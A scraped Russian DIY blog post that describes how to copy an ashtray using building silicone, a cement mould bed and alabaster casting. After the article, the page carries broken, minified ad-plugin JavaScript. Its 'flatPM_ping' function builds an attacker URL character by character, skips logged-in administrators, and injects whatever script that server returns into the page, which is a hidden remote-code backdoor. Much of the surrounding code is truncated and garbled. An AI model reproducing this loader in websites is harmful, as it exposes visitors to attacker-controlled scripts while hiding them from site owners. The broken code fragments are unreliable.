Кстати про запах, запах при этом стоит фантастический, чем то напоминает уксус. Поэтому всё это лучше проделывать на свежем воздухе или при открытых окнах. После обмазывания, пристроил пепельницу в стояк туалета ибо там тепло и сухо, сушил её там около недели, так сказать, для верности.

После застывания силикона, срезал все выступающие лохмотья и бугры, чтобы они не мешались при отливке ложа для силикона. С пепельницы силикон не снимаем, так как неизвестно, порвётся он при этом или нет. Когда будет готово ложе, тогда и снимем.

Распустил пару пластиковых бутылок на полоски и спаял раскалённой иглой из них кольцо. Радиус кольца сделал на пару сантиметров больше самой пепельницы.

Термоклеем приклеил основание кольца к куску картона.

Сбоку на самой силиконовой форме прочертил маркером линию по самой выступающей его части. Это нужно для того, чтобы видеть верхний уровень для раствора. Если перелить, то мы не сможем извлечь нашу силиконовую форму из ложа.

Постелил внутри кольца кусок полиэтилена с напусками наружу.

Намешал цементный раствор и залил его в эту чашу примерно до половины. После чего, строго вертикально погружаем в раствор нашу пепельницу. При этом стараемся не допускать образования воздушных карманов под силиконовой формой. Чтобы точно быть уверенным что под формой нет пузырей, я сначала вложил комок раствора в углубление на силиконовой форме, затем быстро перевернул её и опустил этот шар в чашу.

Глядя на нашу линию на форме, докладываем раствор или убираем его. Из какого нибудь шарика можно сделать замок, утопив его на половину в раствор. Но это не обязательно, так как у нас всё имеет неправильную форму, поэтому верхняя половинка по другому просто не оденется.

Сушил где то сутки, после чего смазал солидолом верхнюю кромку раствора. После чего намешал и залил вторую порцию раствора примерно до краёв силиконовой формы.

После того как раствор схватился, разобрал кольцо, чтобы ложе быстрее высохло.

Через пару суток попробовал разобрать ложе. При этом верхнее кольцо развалилось на три части, видимо цементный раствор оказался очень слабым. Надо было при заливке бросить несколько витков проволоки в качестве арматуры. С другой стороны, роль этого кольца минимальна, так как основной объём гипсовой смеси будет заливаться в нижнюю часть ложа.

Теперь можно извлечь пепельницу из силикона. Стоит отметить что это не так просто оказалось сделать, местами она приклеилась намертво, вплоть до того что форма начинала рваться. Похоже плохо промазал в некоторых местах парафином или его там вообще не оказалось.

Укладываем форму в ложе, собираем вокруг него осколки нашего кольца. После чего намешиваем пожиже алебастр и делаем пробную заливку с постоянным потряхиванием ложа.

В зависимости от марки гипса, выжидаем 10-20 минут, разбираем ложе и извлекаем пепельницу из силиконовой формы.

Из силикона гипсовая отливка извлекается очень легко, аккуратно оттягиваем её край и стягиваем вниз как чулок.

Вот здесь видно где форма у меня порвалась при извлечении прототипа из неё. На копии в этих местах появились наплывы в виде катышков, но они легко сглаживаются ногтем, скребком или наждачкой.

Это уже алебастр другого производителя, он темнее предыдущего, но схватывается буквально за пять минут. Первую отливку из него я даже не успел залить в форму, смесь схватилась прямо в банке. Даже греется он намного сильнее белого, прямо как горячие пирожки.

В общем то, как то так мне удалось сделать несколько копий этой пепельницы. Осталось только высушить их, покрасить и закрепить краску лаком. С заливным силиконом конечно всё это можно проделать намного проще наверное, даже ложе не нужно будет делать, так как там стенки будут намного толще и прочнее. Но заливной силикон несколько дороже этого и его использование оправдано если нужно очень много копий чего либо. А мне для нескольких отливок и этого способа вполне хватило.

После того как были сделаны несколько копий, решил её не снимать с последней отливки, в надежде на то, что на гипсе она меньше будет деформироваться и будет дольше держать свою форму. Но это не помогло, где то через пару месяцев она начала усыхать прямо на пепельнице, появились пустоты под силиконом, местами она натянулась как батут. В общем я это к тому, что если надумаете что-то копировать с помощью строительного силикона, то старайтесь сразу делать нужное количество копий, так как форма со временем приходит в негодность. Может её усыхание и не влияет на внешний вид некоторых деталей, но в размере они будут явно меньше. Возможно этих недостатков в виде усыхания, нет у более дорогих или заливных силиконов, но про них я ничего не знаю.

Написать сообщение автору
Автор: Nikolay Golovin — — — — — — — —
06.12.2013

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика